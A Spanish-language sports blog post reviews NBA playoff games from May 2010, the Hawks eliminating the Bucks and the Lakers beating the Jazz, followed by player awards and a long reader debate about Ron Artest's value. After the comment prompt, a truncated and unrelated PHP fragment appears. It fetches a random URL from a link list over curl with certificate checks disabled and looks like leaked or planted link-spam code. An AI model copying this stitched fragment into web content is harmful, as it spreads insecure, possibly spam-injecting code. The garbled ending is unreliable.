Playoffs 02/05/2010: Demasiado verdes

03 de May de 2010 por TheDeerHunter

Finalmente los temibles ciervos no han pasado de bisoños cervatillos. El último partido en el Phillips Arena de Atlanta, como el anterior en Milwaukee, ha sido un cómodo trámite para los locales y una terrible tortura para los Bucks y sus seguidores. El nivel mostrado en estos últimos dos ha tocado lo bochornoso. En el anterior salvó la cara Delfino pero ayer ya no hubo ninguna cara que salvar. No ha habido color en cuanto los Hawks se lo han propuesto y da la sensación que todos los problemas que han sufrido han sido frutos de una batalla contra sí mismos. Es una lástima que las series de primera ronda ya no sean de 5 partidos.

En un nuevo mal partido de Joe Johnson, el testigo lo cogió Crawford, con Al Horford en su gran línea habitual y una producción muy correcta de Josh Smith y Bibby. Los Hawks fueron mejores en todo, pero especialmente bajo tableros con una diferencia de más de 20 rebotes a su favor más 8 tapones. Tampoco es que les hiciera falta dar muchos de esos, pues los Bucks volvieron a lucierse con otro horripilante 30% en tiro. Si acaso pudiéramos salvar a uno de la falla, elegiríamos a Mbah a Moute, que estuvo simplemente correcto. Los Bucks caen eliminados tras cuajar una temporada ilusionante y unos playoffs que terminan con mal sabor de boca pero donde han mostrado picos de grandeza.

En el otro choque de la noche, este de segunda ronda, los Lakers jugaron a la ruleta rusa con los Jazz. Fue un bonito intercambio de golpes con altísimos porcentajes de acierto y calidad desbordante, pero falto de la tensión propia de playoff. Fue algo extraño. Los locales se mostraban superiores, controlando bien a sus rivales, pero no terminaban de sujetar el resultado. En el último cuarto, con una facilidad pasmosa, los Jazz le dieron la vuelta al resultado pero sin temblarles ni una ceja los locales lo corrigieron en un par de minutos. Kobe hizo anoche lo que le dio la gana y en esa tesitura los Jazz tienen las de perder. Debería cambiar algo si no quieren que esto termine como siempre.

PREMIOS

MVP: La pareja Kobe-Pau hizo y deshizo a su antojo anotando 56 puntos con grandes porcentajes de tiro. Además, Gasol sumó a su aportación anotadora 12 rebotes, 4 asistencias y 5 tapones. Cuando estos dos se ponen poco hay que hacer.

Rookie: Brandon Jennings tuvo una de esas noches de poco acierto de mediados de temporada así que el premio se lo lleva el sorprendente Wesley Matthews y sus 14 puntos y 7 rebotes.

Sorpresa: Al Horford se ha convertido en el mejor hombre de los Hawks en estos últimos partido lo que dice mucho a favor suyo. Anoche destrozó a los Bucks con 16 puntos casi sin fallo y 15 rebotes.

Decepción: Se les encogió el brazo a los Bucks en el último momento. Es lo que llaman el vértigo de la victoria (y sinó lo llaman, lo llamo yo ahora)

Esfuerzo en vano: Contra Kobe y Pau, Deron y Boozer. Lo intentaron pero finalmente no lo consiguieron. 24 puntos, 8 rebotes para el base y 18 puntos, 12 rebotes para el pívot.

Y MAÑANA…

Nos introducimos de lleno en la segunda ronda con dos grandes partidos. Por un lado el segundo encuentro del Cavs-Celtics, donde está por ver que respuesta dan los verdes a la muestra de poderío de los Cavs en el primer partido, y por el otro la primera de las batallas entre Suns y Spurs. Seguro que han velado armas toda la noche.

Comenta

22 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Ratifico lo dicho por mí hace unos días, estos Lakers, o mejor dicho, todos menos Pau y Kobe, deben mejorar mucho si quieren repetir título.
    A lo mejor van sobrados y se están dosificando, pero la sensación que da es que no dan más de sí.
    Casi tiran el partido por la borda ante los peores Jazz de los últimos años (sin Kirilenko y Okur), con Mathews y Miles que son buenos pero sin experiencia, Fesenko (es una broma?),….Nuevamente ganaron gracias a unos excelentes Pau & Kobe, aparte de éstos, no hay nadie más que asuma cierta responsabilidad en ataque. Alguién ve a Artest y a Odom en ataque?

      Citar

  2. TheDeerHunter dice:
    #2

    Se han dicho muchas cosas, pero yo ayer vi mucha facilidad para tumbar a Utah… de hecho, bastante más facilidad que contra Thunder.
    Kobe anotó literalmente lo que le dió la gana… y Gasol estuvo imperial. Muy bien también a Fisher, que está haciendo unos playoffs cojonudos.
    Es cierto que me preocupa el rol de Artest en esta serie, a pesar que ayer estuvo mejor que otros días ofensivamente (para mí su aportación ofensiva debería de ser siempre marginal) igual que el papel de Odom (aunque fue fundamental al final, ojo) y el estado de Bynum (que aún medio cojo les hizo un roto) Del banco los vi francamente bien durante la primera parte, en la segunda estuvieron peor y Utah les hizo pagar todos los errores.

    No estoy de acuerdo conque sean los peores Jazz de los últimos años. Están jugando francamente bien. Deron y Boozer en la cima de su carrera hasta el momento. Con Kirilenko y Okur… y sin Bynum el año pasado fue muchísimo más fácil. Estos Jazz son de lo mejorcito ofensivamente de la liga, con muy buena aportación de Millsap, CJ Miles, Matthews, Korver y Price… si echan algo de menos a Kirilenko no será en ese sentido, que nadie crea que eso lo mejorará el ruso y Okur no es tan fundamental como lo fue en su día.
    Por este lado el partido tuvo dos fases: en la primera parte los Lakers defendieron bien o muy bien, pero los Jazz atacaron genial (no tan genial como Lakers que rozaban el 70%) tras el descanso es cierto que la actitud no me gustó. Otra vez la autosuficiencia que siempre comento… pero cuando el partido podía peligrar me pareció que los Lakers iban sobradísimos y lo sabían (para lo bueno y para lo malo)

    Desde luego, estoy de acuerdo conque a este nivel no se ganan anillos… pero tampoco creo que Orlando o Cleveland (quizás estos sí ahora mismo) hayan mostrado nada real.
    Este equipo va a ir mejorando conforme pasen las eliminatorias, y me parece que si se ponen con un 2-0 la final de conferencia está asegurada.

    PD: Me han parecido bastante más equipo los Thunder que los Jazz, de momento.

      Citar

  3. Love Denise dice:
    #3

    ya pero, por qué no matan el partido, se relajan, juegan con fuego, y sólo reaccionan cuando se ven con el agua al cuello? pregunto: dosificación, relajación, o que no dan más de sí?
    en la previa tambien he dicho que en teoría, los Jazz deberían de darles menos quebraderos de cabeza que los Thunder. Con Kirilenko y Okur, estos Jazz mejorarían muchísimo.
    No veo conveniente el decir, “el año pasado fue más facil..”, las plantillas y el rendimiento de los jugadores cambian de un año a otro.

      Citar

  4. pcerezo dice:
    #4

    La serie de Atlanta-Bucks ratifica la pésima calidad de la Conferencia Este. Por muchos análisis sesudos que se hagan y por mucho que se escriba solo hay tres equipos buenos y uno decente lo demás no pasa de mediocre.

    Lakers a lo suyo. Viendo a los Jazz creo que los que les van a poner probleas serios van a ser Spurs (les doy favoritos frente a Suns) y cualquiera de Magic y Cavs les pueden dar un revolcon.

    Qué bueno y a qué nivel está llegando Pau Gasol. Nadie nos imaginábamos que podía a llegar a ser el jugador actual.

    Un saludo,
    Pablo

      Citar

  5. Love Denise dice:
    #5

    pues yo creo que los Hawks van a poner en ciertos apuros a los Magic. No veo ningun 4-0

      Citar

  6. MagicJohnson32 dice:
    #6

    “Los peores Jazz de los últimos años” vienen de merendarse a unos Nuggets a los que había quienes veían como serios candidatos a las Finales.

    Lo que es indudable es que el partido debió quedar resuelto mucho antes en favor de Lakers y que la imagen que quedó de la segunda unidad fue muy pobre. Odom, que estaba haciendo un partido terrible, tuvo la suerte de que Phil lo mantuvo en pista en los últimos minutos y el acierto de ser fundamental con un par de acciones.

    De todos modos, si Kobe y Pau siguen anotando con tanta facilidad los Lakers pasarán sin problemas, porque será raro que Artest+Bynum+Odom+resto del banco aporten tan poco.

      Citar

  7. TheDeerHunter dice:
    #7

    No sé mató el partido primero porque los Jazz no dejaron matarlo. No todo puede resumirse siempre con la actitud, por muy grande que seas.
    No creo que se pueda poner ningún pero a la defensa en la primera parte. Los Jazz tuvieron que hacer lanzamientos complicadísimos, pero por talento puro y duro los convirtieron. Fue bestial, porque en condiciones normales los Lakers se habrían puesto con 25 puntos de ventaja con ese acierto del tiro.

    Luego cundió un poco el desconcierto… pero vuelvo a insistir que Utah tuvo un nivel ofensivo que no he visto nunca en ese equipo (y me cansé de ver a los Jazz subcampeones, ojo) A pesar de lo que pasó ayer tampoco podemos olvidar que mancos tampoco son defensivamente. Los Lakers hicieron fácil lo difícil… y es que parecía fácil anotar contra Utah.

      Citar

  8. Love Denise dice:
    #8

    Los Nuggets han estado muy por debajo de su nivel vs Jazz.
    Los Nuggets a su nivel habitual, nunca hubiesen sido eliminados por Utah

      Citar

  9. kantonyo dice:
    #9

    Pues yo tuve muy buenas sensaciones respecto a los Lakers en el partido de ayer. Creo que dieron un salto de calidad, y creo que Utah es mucho mejor equipo que Thunder. No va a ser tan facil derrotarlos, pero es verdad que un equipo como Thunder, con velocidad y juventud le hace más daño al conjunto angelino.

    Artest con tanta defensa se ha convertido en un lastre ofensivamente. Ha sido de largo el peor jugador de toda la primera ronda, no sólo de lakers, en aspectos ofensivos. 1ª Ronda. 21/62 34%, 6/32 19% 3p, 9 Eff en sus 37 minutos jugados: 8 puntos, 3 reb, 3 asis. Yo personalmente no le veo útil en esta serie, por lo que le daría lo menos minutos posibles. Es triste ver como estando sólo no es capaz de meter un triple. creo sinceramente que Gasol tendría más efectividad desde la linea de 3p, y seguro que encontraria más huecos.

      Citar

  10. kantonyo dice:
    #10

    Love, muchas veces estar por debajo de tus posibilidades no es culpa de uno mismo, sino de el equipo que tengas en frente. Yo he sido uno de los mayores defensores del equipo de Colorado este año, pero acepto que Utah ha sido un equipo muchísimo mejor en la eliminatoria. Han sabido frenar a Carmelo, y Deron ha sido más determinante que Billups, que ha sido el mejor de Nuggets.

      Citar

  11. MagicJohnson32 dice:
    #11

    Claro que los Nuggets han estado por debajo de su nivel, pero algo habrán tenido que ver los Jazz en ello, digo yo.

    Desde la perspectiva laker, lo mejor fue ver a Bryant aparentemente recuperado de la rodilla. Se fue por velocidad cuando quiso, atacó el aro con agresividad… hacía tiempo que no lo veía tan bien físicamente.

    Sobre Artest, es cierto que está negado especialmente con los triples. Se le ha de reconocer una cosa, sin embargo: está seleccionando los tiros. Lanza cuando debe, acepta su rol y no se obceca, que era lo que muchos presagiaban cuando firmó por LAL. Que se tome la eliminatoria como un respiro para cuando haga realmente falta.

      Citar

  12. TheDeerHunter dice:
    #12

    Eso es lo que yo digo… si Artest es un paquete y siempre lo ha sido en ataque (aunque él se crea lo contrario) Lo que más me gusta a mí es que tire poco.
    Supongo Kantonyo que tu comentario era sobre el plano ofensivo, porque para mí, por detrás de Gasol habría sido el MVP de la eliminatoria contra los Thunder.

      Citar

  13. kantonyo dice:
    #13

    Sí, por supuesto que me refiero al plano ofensivo. Defensivamente ha sido LA CLAVE en la eliminatoria. Recuerdo que Kevin Durant ha sido el segundo jugador de la liga regular con mayor eficiencia, 28 por partido, con 30 puntos (2p: 50%,3p:36%,tc:47%), y en la eliminatoria se ha quedado en 19 eff, con 25 pts (2p:37%, 3p: 28%,tc: 35%) con 3,7 perdidas. Está claro que Artest es el responsable de que Durant haya parecido un jugador del monton.

      Citar

  14. Txusma dice:
    #14

    Ya sé que el dinero lo pone Buss y a nosotros nos da igual, pero nadie ve exagerado pagar 6 kilos por un tio que sólo defiende y que no es capaz de anotar un triple solo? No sé, yo os veo muy conformistas a los amarillos en ese sentido y es que sobrevuela la idea del “podrá ser peor. Al menos que no se vuelva loco”.

      Citar

  15. MagicJohnson32 dice:
    #15

    Te diré si Artest es caro o barato cuando se acabe la temporada. Es imposible hacer un balance de su rendimiento ahora porque se le ha fichado para parar a 3’s, y de momento con Durant ha cumplido.

      Citar

  16. Txusma dice:
    #16

    Entiendo entonces que si acaba la temporada y Artest ha defendido bien a todos los 3 rivales estaréis contentos aunque haya estado horrible en ataque. A simple vista gente como Sefolosha, Mbah-a-Moute, Affalo, Barnes, etc… parecen también capacitados y no cobran los millones que cobra Artest. Entiendo que debe ofrecer algo más que estos.

      Citar

  17. kantonyo dice:
    #17

    Bueno Txusma, ni Sefolosha, MBah, Affalo o Barnes, todavía no han demostrado que pueden dejar a Durant en esos números….

      Citar

  18. pcerezo dice:
    #18

    Sigo pensando que Artest no aporta más de lo que aportaba Ariza y que Ariza era mejor en ataque en ese sentido creo que estos Lakers son peores que los del año pasado pero puede que les llegue para ser campeones, porque también creo que Gasol está mejor.

      Citar

  19. TheDeerHunter dice:
    #19

    Es objetivamente demostrable que Artest aporta más que Ariza en defensa. No es que aporte más… es que aporta muchísimo más. No me parecen ni comparables, al igual que todos los nombres que se han mencionado aquí.

    De hecho, le iba a contestar a Txusma que en su caso me parece todavía más extraño que defienda ese argumento… porque dudo mucho que se quejara de la producción ofensiva de un tal Rodman en su día… y el gusano era incluso menos productivo que Artest en ataque.

    A Artest se le ha criticado toda la temporada y en buena medida sin razón… pero ya me parece incomprensible que se le esté criticando ahora mismo, cuando viene de merendarse al 2º MVP.

    Me parece que si finalmente se alcanza el título será en buena parte gracias a Artest… y si no dudo mucho que vaya a ser por su culpa… lo digo por lo visto hasta la fecha.

      Citar

  20. noname dice:
    #20

    A Artest hay que valorarle en el plano defensivo porque en ataque su contribución debe de ser la de liberar a Kobe de trabajo para que pueda desplegar lo que mejor sabe hacer.

    Prefiero a Artest defendiendo al 80% –> Kobe liberado 80% que Ariza 50% defensa y aportando tambien 50% en ataque si va a probocar que Kebe se tenga que emplear a fondo en la defensa de las estrellas rivales.

      Citar

  21. Txusma dice:
    #21

    No nombres al Gusano, en vano!! 😀
    Entiendo perfectamente lo q quereis decir pero yo esperaba algo más de Artest, sobretodo en el aspecto ofensivo. Aunq claro, puede llegar a entender que si ti nivel defensivo es altísimo luego no puedas estar todo lo lucido en ataque que te gustaria.

      Citar

  22. Toni dice:
    #22

    Artest en esta eliminatoria esta “medio” liberado de su principal tarea, la defensiva, pero ya puede descansar que en final de conferencia le puede caer o un muy reforzado JRich o Manu (no creo que defienda a Jefferson si el principal peligro lo tiene el argentino) y en una posible final ante Carter o Lebron así que… el duelo Artest-Lebron en una hipotética final puede ser impresionante.
    Estoy de acuerdo con el resumen del partido que dice que gran parte fue un intercanvio de golpes y gran parte el encuentro estuvo falto de ritmo de playoff aunque fué estraño, las culpables de ésto no fueron las defensas ya que sobre todo LA defendió a las mil maravillas a ratos, hubo tramos que el partido era canastón tras canastón, Boozer, Pau, Kobe, fadeway Kobe, 2+1… A mi personalmente me gustó el partido aunque otro gallo hubiera cantado si Lakers hubiera caido jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>